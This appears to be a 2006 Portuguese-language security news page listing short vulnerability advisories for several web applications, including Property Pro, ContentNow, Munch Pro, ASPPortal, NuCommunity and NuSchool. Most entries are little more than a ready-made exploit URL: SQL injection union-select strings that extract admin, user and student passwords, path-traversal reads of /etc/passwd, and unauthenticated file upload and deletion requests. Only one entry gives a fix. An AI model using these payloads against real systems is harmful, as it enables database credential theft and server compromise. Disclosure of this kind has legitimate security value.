Property Pro: Injeção de Codigos SQL Avaliação do Usuário: / 0 Por Raphael Martins (Ashiyakuza)    13 de November de 2006 Nome do Script: Property Pro Site do script: www.property-pro.co.uk Versão Afetada: 1.0 Encontrado por ajann Email: ajannhwt [at] hotmail.com Exploração: http://[target]/[path]/admin/ Usuário: ' union select 0,0 from admin   ContentNow: Múltiplas Falhas Remotas Avaliação do Usuário: / 0 Por Raphael Martins (Ashiyakuza)    13 de November de 2006 Nome do Script: ContentNow Site do script: http://www.contentnow.mf4k.de/ Versão Afetada: 1.30 Encontrado por r0ut3r Email: writ3r [at] gmail.com Exploração(Inclusão de Arquivo Local): http://localhost/cn/edit.php?lang=../../../../etc/passwd%00 http://localhost/cn/image.php?lang=../../../../etc/passwd%00 http://localhost/cn/upload.php?lang=../../../../etc/passwd%00 Exploração(Upload de arquivo): http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en Obs.:Você precisa ter permissão de escrita no diretório a ser escolhido como destino Exploração(remoção de arquivo): http://localhost/contentnow_130/cn/upload.php?path=[Diretorio]&cid=&type=file&folder=&lang=en&delfile=[Arquivo]&single=false Como Consertar: Restrição de acesso ao diretório CN com uso do .htaccess   Munch Pro: Injeção de Codigos SQL Avaliação do Usuário: / 0 Por Raphael Martins (Ashiyakuza)    12 de November de 2006 Nome do Script: Munch Pro Site do script: http://isystems.7host.com/isystems/ Versão Afetada: 1.0 Encontrado por ajann Email: ajannhwt [at] hotmail.com Exploração: http://www.target.com/[path]/switch.asp?pg=subMenu&catid=-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%2   ASPPortal: Injeção de Codigos SQL Avaliação do Usuário: / 0 Por Raphael Martins (Ashiyakuza)    12 de November de 2006 Nome do Script: ASPPortal Site do script: http://www.aspportal.net Versão Afetada: 4.0.0 e anteriores Encontrado por ajann Email: ajannhwt [at] hotmail.com Exploração: http://www.target.com/default1.asp?Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20   NuCommunity: Injeção de Codigos SQL Avaliação do Usuário: / 0 Por Raphael Martins (Ashiyakuza)    12 de November de 2006 Nome do Script: NuCommunity Site do script: http://www.dynamicdataworx.com/Sales/NuCommunity.asp Versão Afetada: 1.0 Encontrado por ajann Email: ajannhwt [at] hotmail.com Exploração: http://target/[path]/cl_CatListing.asp?cl_cat_ID=-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20 http://target/[path]/cl_CatListing.asp?cl_cat_ID=-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20   NuSchool: Injeção de Codigos SQL Avaliação do Usuário: / 0 Por Raphael Martins (Ashiyakuza)    11 de November de 2006 Nome do Script: NuSchool Site do script: http://www.dynamicdataworx.com/Sales/NuSchool.asp Versão Afetada: 1.0 Encontrado por ajann Email: ajannhwt [at] hotmail.com Exploração: http://target/[path]/CampusNewsDetails.asp?NewsID=-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20

Mais... NuStore: Injeção de Codigos SQL Sarge Extensão do Firefox Novo vírus ataca por meio de falsa notícia sobre a morte de Bush Shopping_Catalog: Inclusão de Arquivos Remotos LetterIt: Inclusão de Arquivos Remotos CITRIX: Presentation Server's IMA Service DoS local e execução de código arbitrário USN-378-1: Falhas no RPM Agora: Inclusão de Arquivos Remotos Ultimate PHP Board: Inclusão de Arquivos Remotos Drake CMS: Inclusão de Arquivos Remotos MDKSA-196: Atualização do Pacote PHP MODx CMS: Inclusão de Arquivos Remotos DSA-1203: Pacote de Atualização da Biblioteca pam_ldap Lithium: Inclusão de Arquivos Locais Internet Explorer 7: Stack Overflow 2BGal: Inclusão de Arquivos Locais TikiWiki Versão 1.9.5 Sirius: XSS e divulgação de informação restrita P-Book: Inclusão de Arquivos Remotos Coppermine: Falha de Sql Injection DSA 1200-1: Atualização para pacote Qt corrige falha de integer overflow

<< Início < Anterior 1 2 3 4 5 6 7 8 9 Próximo > Fim >>

Resultados 131 - 156 de 234